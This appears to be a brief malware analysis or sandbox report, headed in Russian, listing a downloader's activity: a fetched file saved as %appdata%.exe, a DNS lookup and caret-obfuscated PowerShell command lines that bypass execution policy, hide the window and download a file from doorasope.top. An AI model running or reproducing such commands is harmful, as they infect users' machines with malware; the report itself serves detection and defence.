Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PoWeR^SHELL.e^XE -EXEC^Uti^o^n^PO^lic^Y^ ^by^P^aSs -nO^prOFi^lE -^WiN^dOwS^t^Y^l^e^ hidDeN (^N^EW^-ObjE^ct^ ^s^YST^em^.NET.W^eb^cl^ieNt).Downlo^AdF^I^lE('http://www.doorasope.top/re...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "PoWeR^SHELL.e^XE -EXEC^Uti^o^n^PO^lic^Y^ ^by^P^aSs -nO^prOFi^lE -^WiN^dOwS^t^Y^l^e^ hidDeN (^N^EW^-ObjE^ct^ ^s^YST^em^.NET.W^eb^cl^ieNt).Downlo^AdF^I^lE('http://www.doorasope.top/re...' (со скрытым окном)